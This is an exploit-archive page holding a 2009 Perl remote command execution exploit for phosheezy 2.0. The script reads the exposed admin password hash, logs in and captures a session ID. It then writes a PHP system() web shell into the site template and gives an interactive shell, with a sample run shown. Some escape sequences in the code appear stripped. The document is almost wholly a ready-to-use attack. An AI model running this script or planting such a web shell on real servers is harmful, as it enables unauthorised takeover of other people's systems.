[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : phosheezy 2.0 Remote Command Execution Exploit
# Published : 2009-01-14
# Author : Osirys
# Previous Title : phpList <= 2.10.8 Local File Inclusion Vulnerability
# Next Title : DMXReady PayPal Store Manager <= 1.1 Contents Change Vulnerability


#!/usr/bin/perl

# phosheezy 2.0
# http://www.ryneezy.net/apps/phosheezy/phosheezy-v0.2.tar.gz
# Remote Command Execution Exploit
# by Osirys
# osirys[at]live[dot]it
# osirys.org
# Greets: HaVoC, x0r, jay, BlackLight
# lol at athos

# --------------------------------------------------------------
# Exploit in action :D
# --------------------------------------------------------------
# osirys[~]>$ perl exp.txt http://localhost/phosheezy/
#
#   ----------------------------
#      Phosheezy RCE Exploit
#         Coded by Osirys
#   ----------------------------
#
# [+] Admin password found:
#     Sha1 pwd: 8942c747dc48c47a6f7f026df85a448046348a2c
# [+] Grabbing server headers to get a valid SESSION ID ..
# [+] SESSION ID grabbed: 3srqiuh8jrttt73tbd7j5uvhi2
# [+] Succesfully logged in as Administrator
# [+] Template edited, RCE Vulnerability Created !
# shell$> id
# uid=80(apache) gid=80(apache) groups=80(apache)
# shell$> exit
# [-] Quitting ..
# osirys[~]>$
# --------------------------------------------------------------

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;

my $host       =  $ARGV[0];
my $pwd_path   =  "/config/password";
my $adm_path   =  "/admin.php";
my $templ_path =  "/admin.php?action=3";

help("-1") unless ($host);
cheek($host) == 1 || help("-2");
&banner;

$datas = get_data($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);

my $url = $host.$pwd_path;
my $re = get_req($url);

if ($re =~ /([0-9a-f]{40})/) {
    $password = $1;
    print "[+] Admin password found:n";
    print "    Sha1 pwd: $password  n";
    adm_log($password);
}
else {
    print "[-] Unable to get sha1 Admin passwordnn";
    exit(0);
}

sub adm_log() {
    my $password =  $_[0];
    my $link     =  $path.".".$adm_path;
    my $post     =  "password=$password&Login=Login";
    my $length   =  length($post);
    my @data;
    my $socket   =  new IO::Socket::INET(
                                          PeerAddr => $h0st,
                                          PeerPort => '80',
                                          Proto    => 'tcp',
                                        ) or die $!;

    my $data = "POST ".$link." HTTP/1.1rn".
               "Host: ".$h0st."rn".
               "Content-Type: application/x-www-form-urlencodedrn".
               "Content-Length: ".$length."rnrn".
               $post."rn";

    $socket->send($data);
    print "[+] Grabbing server headers to get a valid SESSION ID ..n";

    while (my $e = <$socket>) {
        push(@data,$e);
    }
    foreach my $e(@data) {
        if ($e =~ /Welcome to Ryneezy PhoSheezy web administration/) {
            $log_ = 1;
            print "[+] Succesfully logged in as Administratorn";
        }
        elsif ($e =~ /Set-Cookie: PHPSESSID=([0-9a-z]{1,50});/) {
            $phpsessid = $1;
            print "[+] SESSION ID grabbed: $phpsessidn";
        }
    }

    (($log_)&&($phpsessid)) || die "[-] Exploit failed -> Login Failed or SESSION ID not grabbed!n";
    RCE_create($phpsessid);
}

sub RCE_create() {
    my $phpsessid = $_[0];
    my $link     =  $path.".".$templ_path;
    my $code = "header=<html><head><title>Ryneezy PhoSheezy</tit".
               "le></head><body bgcolor="#ffffff" text="#0000".
               "00">&footer=</body></html><!-- cmd --><?php sys".
               "tem($_GET[cmd]);?><!--cmd-->&Submit=Edit Layout";
    my $length =  length($code);

    my $socket = new IO::Socket::INET(
                                       PeerAddr => $h0st,
                                       PeerPort => '80',
                                       Proto    => 'tcp',
                                     ) or die $!;

    my $data = "POST ".$link." HTTP/1.1rn".
               "Host: ".$h0st."rn".
               "Cookie: PHPSESSID=".$phpsessid."; hotlog=1rn".
               "Content-Type: application/x-www-form-urlencodedrn".
               "Content-Length: ".$length."rnrn".
               "$codern";

    $socket->send($data);

    while (my $e = <$socket>) {
        if ($e =~ /Edit layout again/) {
            $rce_c = 1;
            print "[+] Template edited, RCE Vulnerability Created !n";
        }
    }

    $rce_c == 1 || die "[-] Can't edit Template. Exploit failednn";
    &exec_cmd;
}

sub exec_cmd {
    print "shell$> ";
    $cmd = <STDIN>;
    $cmd !~ /exit/ || die "[-] Quitting ..n";
    $exec_url = ($host."/index.php?cmd=".$cmd);
    $re = get_req($exec_url);
    if ($re =~ /<!-- cmd -->(.*)/) {
        my $cmd = $1;
        $cmd =~ s/<!--cmd-->/[-] Undefined output or bad cmd !/;
        print "$cmdn";
        &exec_cmd;
    }
    else {
        print "[-] Undefined output or bad cmd !n";
        &exec_cmd;
    }
}

sub get_req() {
    $link   = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua  = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
}

sub cheek() {
    my $host = $_[0];
    if ($host =~ /http://(.*)/) {
        return 1;
    }
    else {
        return 0;
    }
}

sub get_data() {
    my $host = $_[0];
    $host =~ /http://(.*)/;
    $s_host = $1;
    $s_host =~ /([a-z.]{1,30})/(.*)/;
    ($h0st,$path) = ($1,$2);
    $h0st !~ /www/ || $h0st =~ s/www.//;
    $path =~ s/(.*)//$1/;
    $full_det = $h0st." ".$path;
    return $full_det;
}

sub banner {
    print "n".
          "  ---------------------------- n".
          "     Phosheezy RCE Exploit     n".
          "        Coded by Osirys        n".
          "  ---------------------------- nn";
}

sub help() {
    my $error = $_[0];
    if ($error == -1) {
        &banner;
        print "n[-] Cheek that you provide a hostname address!n";
    }
    elsif ($error == -2) {
        &banner;
        print "n[-] Bad hostname address !n";
    }
    print "[*] Usage : perl $0 http://hostname/cms_pathnn";
    exit(0);
}

# www.Syue.com [2009-01-14]